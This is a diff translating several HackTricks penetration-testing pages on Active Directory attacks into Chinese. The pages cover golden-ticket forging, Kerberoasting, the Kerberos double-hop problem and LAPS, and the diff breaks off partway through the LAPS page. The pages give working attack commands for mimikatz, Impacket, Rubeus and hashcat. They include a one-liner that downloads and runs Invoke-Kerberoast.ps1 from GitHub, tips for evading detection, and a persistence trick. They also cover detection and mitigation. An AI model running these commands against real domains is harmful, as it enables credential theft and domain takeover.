+**Golden Ticket** 攻击是指通过使用 **Active Directory (AD) krbtgt 账户的 NTLM 哈希** 来 **创建一个合法的票据授权票 (TGT)，冒充任何用户**。这种技术特别有利，因为它 **使冒充的用户能够访问域内的任何服务或机器**。重要的是要记住，**krbtgt 账户的凭据从不自动更新**。
 
-To **acquire the NTLM hash** of the krbtgt account, various methods can be employed. It can be extracted from the **Local Security Authority Subsystem Service (LSASS) process** or the **NT Directory Services (NTDS.dit) file** located on any Domain Controller (DC) within the domain. Furthermore, **executing a DCsync attack** is another strategy to obtain this NTLM hash, which can be performed using tools such as the **lsadump::dcsync module** in Mimikatz or the **secretsdump.py script** by Impacket. It's important to underscore that to undertake these operations, **domain admin privileges or a similar level of access is typically required**.
-
-Although the NTLM hash serves as a viable method for this purpose, it is **strongly recommended** to **forge tickets using the Advanced Encryption Standard (AES) Kerberos keys (AES128 and AES256)** for operational security reasons.
+要 **获取 krbtgt 账户的 NTLM 哈希**，可以采用多种方法。它可以从 **本地安全授权子系统服务 (LSASS) 进程** 或位于域内任何域控制器 (DC) 上的 **NT 目录服务 (NTDS.dit) 文件** 中提取。此外，**执行 DCsync 攻击** 是获取此 NTLM 哈希的另一种策略，可以使用 **Mimikatz 中的 lsadump::dcsync 模块** 或 **Impacket 的 secretsdump.py 脚本** 来执行。需要强调的是，进行这些操作通常需要 **域管理员权限或类似级别的访问权限**。
 
+尽管 NTLM 哈希作为此目的的可行方法，但 **强烈建议** 使用 **高级加密标准 (AES) Kerberos 密钥 (AES128 和 AES256)** 来 **伪造票据，以确保操作安全**。
 ```bash:From Linux
 python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
 export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
@@ -25,41 +24,37 @@ klist #List tickets in memory
 # Example using aes key
 kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi
 ```
+**一旦**你注入了**金票**，你可以访问共享文件**(C$)**，并执行服务和WMI，因此你可以使用**psexec**或**wmiexec**来获取一个shell（看起来你无法通过winrm获取shell）。
 
-**Once** you have the **golden Ticket injected**, you can access the shared files **(C$)**, and execute services and WMI, so you could use **psexec** or **wmiexec** to obtain a shell (looks like yo can not get a shell via winrm).
+### 绕过常见检测
 
-### Bypassing common detections
-
-The most frequent ways to detect a golden ticket are by **inspecting Kerberos traffic** on the wire. By default, Mimikatz **signs the TGT for 10 years**, which will stand out as anomalous in subsequent TGS requests made with it.
+检测金票的最常见方法是通过**检查网络上的Kerberos流量**。默认情况下，Mimikatz**将TGT签名为10年**，这在后续使用它的TGS请求中会显得异常。
 
 `Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM`
 
-Use the `/startoffset`, `/endin` and `/renewmax` parameters to control the start offset, duration and the maximum renewals (all in minutes).
-
+使用`/startoffset`、`/endin`和`/renewmax`参数来控制开始偏移、持续时间和最大续订（均以分钟为单位）。
 ```
 Get-DomainPolicy | select -expand KerberosPolicy
 ```
+不幸的是，TGT 的生命周期不会在 4769 中记录，因此您无法在 Windows 事件日志中找到此信息。然而，您可以关联的是 **看到 4769 而没有先前的 4768**。**没有 TGT 是无法请求 TGS 的**，如果没有记录显示 TGT 被发放，我们可以推断它是离线伪造的。
 
-Unfortunately, the TGT's lifetime is not logged in 4769's, so you won't find this information in the Windows event logs. However, what you can correlate is **seeing 4769's without a prior 4768**. It's **not possible to request a TGS without a TGT**, and if there is no record of a TGT being issued, we can infer that it was forged offline.
-
-In order to **bypass this detection** check the diamond tickets:
+为了 **绕过此检测**，请检查 diamond tickets：
 
 {{#ref}}
 diamond-ticket.md
 {{#endref}}
 
-### Mitigation
+### 缓解措施
 
-- 4624: Account Logon
-- 4672: Admin Logon
+- 4624: 账户登录
+- 4672: 管理员登录
 - `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property`
 
-Other little tricks defenders can do is **alert on 4769's for sensitive users** such as the default domain administrator account.
+防御者可以做的其他小技巧是 **对敏感用户的 4769 发出警报**，例如默认域管理员账户。
 
-## References
+## 参考文献
 
 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets] (https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md
index 150eaaa5d..523bdec80 100644
--- a/src/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/src/windows-hardening/active-directory-methodology/kerberoast.md
@@ -3,8 +3,8 @@
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
 
@@ -12,25 +12,24 @@ Get Access Today:
 
 ## Kerberoast
 
-Kerberoasting focuses on the acquisition of **TGS tickets**, specifically those related to services operating under **user accounts** in **Active Directory (AD)**, excluding **computer accounts**. The encryption of these tickets utilizes keys that originate from **user passwords**, allowing for the possibility of **offline credential cracking**. The use of a user account as a service is indicated by a non-empty **"ServicePrincipalName"** property.
+Kerberoasting 关注于获取 **TGS 票证**，特别是与 **Active Directory (AD)** 中 **用户帐户** 相关的服务，排除 **计算机帐户**。这些票证的加密使用源自 **用户密码** 的密钥，从而允许 **离线凭证破解** 的可能性。使用用户帐户作为服务的标志是 **"ServicePrincipalName"** 属性非空。
 
-For executing **Kerberoasting**, a domain account capable of requesting **TGS tickets** is essential; however, this process does not demand **special privileges**, making it accessible to anyone with **valid domain credentials**.
+执行 **Kerberoasting** 需要一个能够请求 **TGS 票证** 的域帐户；然而，这个过程并不需要 **特殊权限**，使得任何拥有 **有效域凭证** 的人都可以访问。
 
-### Key Points:
+### 关键点：
 
-- **Kerberoasting** targets **TGS tickets** for **user-account services** within **AD**.
-- Tickets encrypted with keys from **user passwords** can be **cracked offline**.
-- A service is identified by a **ServicePrincipalName** that is not null.
-- **No special privileges** are needed, just **valid domain credentials**.
+- **Kerberoasting** 针对 **AD** 中 **用户帐户服务** 的 **TGS 票证**。
+- 使用 **用户密码** 的密钥加密的票证可以 **离线破解**。
+- 服务通过 **ServicePrincipalName** 的非空值来识别。
+- **不需要特殊权限**，只需 **有效域凭证**。
 
-### **Attack**
+### **攻击**
 
 > [!WARNING]
-> **Kerberoasting tools** typically request **`RC4 encryption`** when performing the attack and initiating TGS-REQ requests. This is because **RC4 is** [**weaker**](https://www.stigviewer.com/stig/windows_10/2017-04-28/finding/V-63795) and easier to crack offline using tools such as Hashcat than other encryption algorithms such as AES-128 and AES-256.\
-> RC4 (type 23) hashes begin with **`$krb5tgs$23$*`** while AES-256(type 18) start with **`$krb5tgs$18$*`**`.`
+> **Kerberoasting 工具** 通常在执行攻击和发起 TGS-REQ 请求时请求 **`RC4 加密`**。这是因为 **RC4 是** [**较弱的**](https://www.stigviewer.com/stig/windows_10/2017-04-28/finding/V-63795)，并且比其他加密算法（如 AES-128 和 AES-256）更容易使用工具（如 Hashcat）进行离线破解。\
+> RC4（类型 23）哈希以 **`$krb5tgs$23$*`** 开头，而 AES-256（类型 18）以 **`$krb5tgs$18$*`** 开头。`.`
 
 #### **Linux**
-
 ```bash
 # Metasploit framework
 msf> use auxiliary/gather/get_user_spns
@@ -41,27 +40,21 @@ GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERN
 kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
 kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
 ```
-
-Multi-features tools including a dump of kerberoastable users:
-
+多功能工具，包括可进行 Kerberoast 的用户转储：
 ```bash
 # ADenum: https://github.com/SecuProject/ADenum
 adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
 ```
-
 #### Windows
 
-- **Enumerate Kerberoastable users**
-
+- **枚举可Kerberoast的用户**
 ```powershell
 # Get Kerberoastable users
 setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
 Get-NetUser -SPN | select serviceprincipalname #Powerview
 .\Rubeus.exe kerberoast /stats
 ```
-
-- **Technique 1: Ask for TGS and dump it from memory**
-
+- **技术 1：请求 TGS 并从内存中转储**
 ```powershell
 #Get TGS in memory from a single user
 Add-Type -AssemblyName System.IdentityModel
@@ -81,9 +74,7 @@ python2.7 kirbi2john.py sqldev.kirbi
 # Transform john to hashcat
 sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
 ```
-
-- **Technique 2: Automatic tools**
-
+- **技术 2：自动化工具**
 ```bash
 # Powerview: Get Kerberoast hash of a user
 Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
@@ -99,88 +90,77 @@ Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerbe
 iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
 Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
 ```
-
 > [!WARNING]
-> When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
+> 当请求 TGS 时，生成 Windows 事件 `4769 - A Kerberos service ticket was requested`。
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
 
-### Cracking
-
+### 破解
 ```bash
 john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
 hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
 ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
 ```
+### 持久性
 
-### Persistence
-
-If you have **enough permissions** over a user you can **make it kerberoastable**:
-
+如果您对用户拥有**足够的权限**，您可以**使其可进行 Kerberoast**：
 ```bash
- Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
+Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
 ```
+您可以在这里找到用于 **kerberoast** 攻击的有用 **工具**: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
 
-You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
+如果您在 Linux 中发现此 **错误**: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`**，这可能是由于您的本地时间，您需要将主机与 DC 同步。有几个选项：
 
-If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC. There are a few options:
-
-- `ntpdate <IP of DC>` - Deprecated as of Ubuntu 16.04
+- `ntpdate <IP of DC>` - 自 Ubuntu 16.04 起已弃用
 - `rdate -n <IP of DC>`
 
-### Mitigation
+### 缓解措施
 
-Kerberoasting can be conducted with a high degree of stealthiness if it is exploitable. In order to detect this activity, attention should be paid to **Security Event ID 4769**, which indicates that a Kerberos ticket has been requested. However, due to the high frequency of this event, specific filters must be applied to isolate suspicious activities:
-
-- The service name should not be **krbtgt**, as this is a normal request.
-- Service names ending with **$** should be excluded to avoid including machine accounts used for services.
-- Requests from machines should be filtered out by excluding account names formatted as **machine@domain**.
-- Only successful ticket requests should be considered, identified by a failure code of **'0x0'**.
-- **Most importantly**, the ticket encryption type should be **0x17**, which is often used in Kerberoasting attacks.
+如果可利用，Kerberoasting 可以以高度隐蔽的方式进行。为了检测此活动，应关注 **安全事件 ID 4769**，该事件表示请求了 Kerberos 票证。然而，由于此事件的高频率，必须应用特定过滤器以隔离可疑活动：
 
+- 服务名称不应为 **krbtgt**，因为这是正常请求。
+- 以 **$** 结尾的服务名称应被排除，以避免包括用于服务的机器帐户。
+- 应通过排除格式为 **machine@domain** 的帐户名称来过滤来自机器的请求。
+- 仅应考虑成功的票证请求，通过失败代码 **'0x0'** 识别。
+- **最重要的是**，票证加密类型应为 **0x17**，这通常在 Kerberoasting 攻击中使用。
 ```bash
 Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
 ```
+为了降低 Kerberoasting 的风险：
 
-To mitigate the risk of Kerberoasting:
+- 确保 **服务账户密码难以猜测**，建议长度超过 **25 个字符**。
+- 利用 **托管服务账户**，提供 **自动密码更改** 和 **委派服务主体名称 (SPN) 管理** 等好处，增强对这种攻击的安全性。
 
-- Ensure that **Service Account Passwords are difficult to guess**, recommending a length of more than **25 characters**.
-- Utilize **Managed Service Accounts**, which offer benefits like **automatic password changes** and **delegated Service Principal Name (SPN) Management**, enhancing security against such attacks.
-
-By implementing these measures, organizations can significantly reduce the risk associated with Kerberoasting.
+通过实施这些措施，组织可以显著降低与 Kerberoasting 相关的风险。
 
 ## Kerberoast w/o domain account
 
-In **September 2022**, a new way to exploit a system was brought to light by a researcher named Charlie Clark, shared through his platform [exploit.ph](https://exploit.ph/). This method allows for the acquisition of **Service Tickets (ST)** via a **KRB_AS_REQ** request, which remarkably does not necessitate control over any Active Directory account. Essentially, if a principal is set up in such a way that it doesn't require pre-authentication—a scenario similar to what's known in the cybersecurity realm as an **AS-REP Roasting attack**—this characteristic can be leveraged to manipulate the request process. Specifically, by altering the **sname** attribute within the request's body, the system is deceived into issuing a **ST** rather than the standard encrypted Ticket Granting Ticket (TGT).
+在 **2022 年 9 月**，一位名为 Charlie Clark 的研究人员揭示了一种新的系统利用方式，通过他的平台 [exploit.ph](https://exploit.ph/) 分享。这种方法允许通过 **KRB_AS_REQ** 请求获取 **服务票据 (ST)**，而令人惊讶的是，这并不需要控制任何 Active Directory 账户。基本上，如果一个主体设置为不需要预身份验证——这种情况类似于网络安全领域所称的 **AS-REP Roasting 攻击**——则可以利用这一特性来操纵请求过程。具体来说，通过更改请求主体中的 **sname** 属性，系统被欺骗发出 **ST** 而不是标准的加密票据授予票据 (TGT)。
 
-The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
+该技术在这篇文章中有详细解释：[Semperis 博客文章](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/)。
 
 > [!WARNING]
-> You must provide a list of users because we don't have a valid account to query the LDAP using this technique.
+> 你必须提供用户列表，因为我们没有有效的账户来使用此技术查询 LDAP。
 
 #### Linux
 
 - [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413):
-
 ```bash
 GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
 ```
-
 #### Windows
 
 - [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139):
-
 ```bash
 Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
 ```
-
-## References
+## 参考文献
 
 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
@@ -191,8 +171,7 @@ Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"d
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
-
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-authentication.md b/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
index 7e73c6993..4f08c5b9a 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
@@ -1,8 +1,7 @@
-# Kerberos Authentication
+# Kerberos 认证
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the amazing post from:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
+**查看精彩的帖子来自：** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 93f25bf78..5f656abf8 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -6,98 +6,86 @@
 
 {% embed url="https://websec.nl/" %}
 
-## Introduction
+## 介绍
 
-The Kerberos "Double Hop" problem appears when an attacker attempts to use **Kerberos authentication across two** **hops**, for example using **PowerShell**/**WinRM**.
+Kerberos "双跳" 问题出现在攻击者试图在两个跳之间使用 **Kerberos 认证** 时，例如使用 **PowerShell**/**WinRM**。
 
-When an **authentication** occurs through **Kerberos**, **credentials** **aren't** cached in **memory.** Therefore, if you run mimikatz you **won't find credentials** of the user in the machine even if he is running processes.
+当通过 **Kerberos** 进行 **认证** 时，**凭据** **不会** 被缓存到 **内存** 中。因此，如果你运行 mimikatz，你 **不会找到用户的凭据** 在机器上，即使他正在运行进程。
 
-This is because when connecting with Kerberos these are the steps:
+这是因为在使用 Kerberos 连接时，步骤如下：
 
-1. User1 provides credentials and **domain controller** returns a Kerberos **TGT** to the User1.
-2. User1 uses **TGT** to request a **service ticket** to **connect** to Server1.
-3. User1 **connects** to **Server1** and provides **service ticket**.
-4. **Server1** **doesn't** have **credentials** of User1 cached or the **TGT** of User1. Therefore, when User1 from Server1 tries to login to a second server, he is **not able to authenticate**.
+1. User1 提供凭据，**域控制器** 返回一个 Kerberos **TGT** 给 User1。
+2. User1 使用 **TGT** 请求一个 **服务票据** 以 **连接** 到 Server1。
+3. User1 **连接** 到 **Server1** 并提供 **服务票据**。
+4. **Server1** **没有** 缓存 User1 的 **凭据** 或 User1 的 **TGT**。因此，当 User1 从 Server1 尝试登录到第二台服务器时，他 **无法进行认证**。
 
-### Unconstrained Delegation
+### 不受限制的委派
 
-If **unconstrained delegation** is enabled in the PC, this won't happen as the **Server** will **get** a **TGT** of each user accessing it. Moreover, if unconstrained delegation is used you probably can **compromise the Domain Controller** from it.\
-[**More info in the unconstrained delegation page**](unconstrained-delegation.md).
+如果在 PC 上启用了 **不受限制的委派**，则不会发生这种情况，因为 **服务器** 将 **获取** 每个访问它的用户的 **TGT**。此外，如果使用不受限制的委派，你可能可以 **从中妥协域控制器**。\
+[**更多信息请参见不受限制的委派页面**](unconstrained-delegation.md)。
 
 ### CredSSP
 
-Another way to avoid this problem which is [**notably insecure**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) is **Credential Security Support Provider**. From Microsoft:
+另一种避免此问题的方法是 [**显著不安全**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) 的 **凭据安全支持提供程序**。来自微软的说明：
 
-> CredSSP authentication delegates the user credentials from the local computer to a remote computer. This practice increases the security risk of the remote operation. If the remote computer is compromised, when credentials are passed to it, the credentials can be used to control the network session.
-
-It is highly recommended that **CredSSP** be disabled on production systems, sensitive networks, and similar environments due to security concerns. To determine whether **CredSSP** is enabled, the `Get-WSManCredSSP` command can be run. This command allows for the **checking of CredSSP status** and can even be executed remotely, provided **WinRM** is enabled.
+> CredSSP 认证将用户凭据从本地计算机委派到远程计算机。这种做法增加了远程操作的安全风险。如果远程计算机被攻破，当凭据被传递给它时，这些凭据可以用于控制网络会话。
 
+由于安全问题，强烈建议在生产系统、敏感网络和类似环境中禁用 **CredSSP**。要确定 **CredSSP** 是否启用，可以运行 `Get-WSManCredSSP` 命令。此命令允许 **检查 CredSSP 状态**，并且可以在启用 **WinRM** 的情况下远程执行。
 ```powershell
 Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
-    Get-WSManCredSSP
+Get-WSManCredSSP
 }
 ```
-
-## Workarounds
+## 解决方法
 
 ### Invoke Command
 
-To address the double hop issue, a method involving a nested `Invoke-Command` is presented. This does not solve the problem directly but offers a workaround without needing special configurations. The approach allows executing a command (`hostname`) on a secondary server through a PowerShell command executed from an initial attacking machine or through a previously established PS-Session with the first server. Here's how it's done:
-
+为了解决双跳问题，提出了一种涉及嵌套 `Invoke-Command` 的方法。这并不能直接解决问题，但提供了一种无需特殊配置的变通方法。该方法允许通过从初始攻击机器执行的 PowerShell 命令或通过与第一服务器之前建立的 PS-Session，在辅助服务器上执行命令（`hostname`）。以下是具体操作步骤：
 ```powershell
 $cred = Get-Credential ta\redsuit
 Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock {
-    Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
+Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
 }
 ```
+另外，建议与第一个服务器建立 PS-Session，并使用 `$cred` 运行 `Invoke-Command` 来集中任务。
 
-Alternatively, establishing a PS-Session with the first server and running the `Invoke-Command` using `$cred` is suggested for centralizing tasks.
-
-### Register PSSession Configuration
-
-A solution to bypass the double hop problem involves using `Register-PSSessionConfiguration` with `Enter-PSSession`. This method requires a different approach than `evil-winrm` and allows for a session that does not suffer from the double hop limitation.
+### 注册 PSSession 配置
 
+绕过双跳问题的解决方案涉及使用 `Register-PSSessionConfiguration` 和 `Enter-PSSession`。这种方法需要与 `evil-winrm` 不同的方式，并允许创建不受双跳限制的会话。
 ```powershell
 Register-PSSessionConfiguration -Name doublehopsess -RunAsCredential domain_name\username
 Restart-Service WinRM
 Enter-PSSession -ConfigurationName doublehopsess -ComputerName <pc_name> -Credential domain_name\username
 klist
 ```
-
 ### PortForwarding
 
-For local administrators on an intermediary target, port forwarding allows requests to be sent to a final server. Using `netsh`, a rule can be added for port forwarding, alongside a Windows firewall rule to allow the forwarded port.
-
+对于中介目标上的本地管理员，端口转发允许请求发送到最终服务器。使用 `netsh`，可以添加一个端口转发规则，以及一个 Windows 防火墙规则以允许转发的端口。
 ```bash
 netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
 netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
 ```
-
 #### winrs.exe
 
-`winrs.exe` can be used for forwarding WinRM requests, potentially as a less detectable option if PowerShell monitoring is a concern. The command below demonstrates its use:
-
+`winrs.exe` 可用于转发 WinRM 请求，如果 PowerShell 监控是一个问题，它可能是一个不太容易被检测到的选项。下面的命令演示了它的用法：
 ```bash
 winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
 ```
-
 ### OpenSSH
 
-Installing OpenSSH on the first server enables a workaround for the double-hop issue, particularly useful for jump box scenarios. This method requires CLI installation and setup of OpenSSH for Windows. When configured for Password Authentication, this allows the intermediary server to obtain a TGT on behalf of the user.
+在第一台服务器上安装 OpenSSH 可以为双跳问题提供解决方法，特别适用于跳板机场景。此方法需要在 Windows 上进行 CLI 安装和配置 OpenSSH。当配置为密码认证时，这允许中介服务器代表用户获取 TGT。
 
-#### OpenSSH Installation Steps
+#### OpenSSH 安装步骤
 
-1. Download and move the latest OpenSSH release zip to the target server.
-2. Unzip and run the `Install-sshd.ps1` script.
-3. Add a firewall rule to open port 22 and verify SSH services are running.
-
-To resolve `Connection reset` errors, permissions might need to be updated to allow everyone read and execute access on the OpenSSH directory.
+1. 下载并将最新的 OpenSSH 发布 zip 移动到目标服务器。
+2. 解压并运行 `Install-sshd.ps1` 脚本。
+3. 添加防火墙规则以打开 22 端口，并验证 SSH 服务是否正在运行。
 
+要解决 `Connection reset` 错误，可能需要更新权限以允许所有人对 OpenSSH 目录的读取和执行访问。
 ```bash
 icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
 ```
-
-## References
+## 参考文献
 
 - [https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/understanding-kerberos-double-hop/ba-p/395463?lightbox-message-images-395463=102145i720503211E78AC20](https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/understanding-kerberos-double-hop/ba-p/395463?lightbox-message-images-395463=102145i720503211E78AC20)
 - [https://posts.slayerlabs.com/double-hop/](https://posts.slayerlabs.com/double-hop/)
@@ -109,4 +97,3 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/laps.md b/src/windows-hardening/active-directory-methodology/laps.md
index 16b6f32e0..a04cba4e2 100644
--- a/src/windows-hardening/active-directory-methodology/laps.md
+++ b/src/windows-hardening/active-directory-methodology/laps.md
@@ -6,14 +6,13 @@
 
 {% embed url="https://websec.nl/" %}
 
-## Basic Information
+## 基本信息
 
-Local Administrator Password Solution (LAPS) is a tool used for managing a system where **administrator passwords**, which are **unique, randomized, and frequently changed**, are applied to domain-joined computers. These passwords are stored securely within Active Directory and are only accessible to users who have been granted permission through Access Control Lists (ACLs). The security of the password transmissions from the client to the server is ensured by the use of **Kerberos version 5** and **Advanced Encryption Standard (AES)**.
+Local Administrator Password Solution (LAPS) 是一个用于管理系统的工具，其中 **管理员密码** 是 **唯一的、随机生成的，并且经常更改**，适用于加入域的计算机。这些密码安全地存储在 Active Directory 中，仅对通过访问控制列表 (ACL) 获得权限的用户可访问。客户端到服务器的密码传输安全性通过使用 **Kerberos 版本 5** 和 **高级加密标准 (AES)** 得到保障。
 
-In the domain's computer objects, the implementation of LAPS results in the addition of two new attributes: **`ms-mcs-AdmPwd`** and **`ms-mcs-AdmPwdExpirationTime`**. These attributes store the **plain-text administrator password** and **its expiration time**, respectively.
-
-### Check if activated
+在域的计算机对象中，LAPS 的实施导致添加两个新属性：**`ms-mcs-AdmPwd`** 和 **`ms-mcs-AdmPwdExpirationTime`**。这些属性分别存储 **明文管理员密码** 和 **其过期时间**。
 
+### 检查是否已激活
 ```bash
 reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
 
@@ -26,13 +25,11 @@ Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name,
 # Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
 Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
 ```
+### LAPS 密码访问
 
-### LAPS Password Access
-
-You could **download the raw LAPS policy** from `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` and then use **`Parse-PolFile`** from the [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) package can be used to convert this file into human-readable format.
-
-Moreover, the **native LAPS PowerShell cmdlets** can be used if they're installed on a machine we have access to:
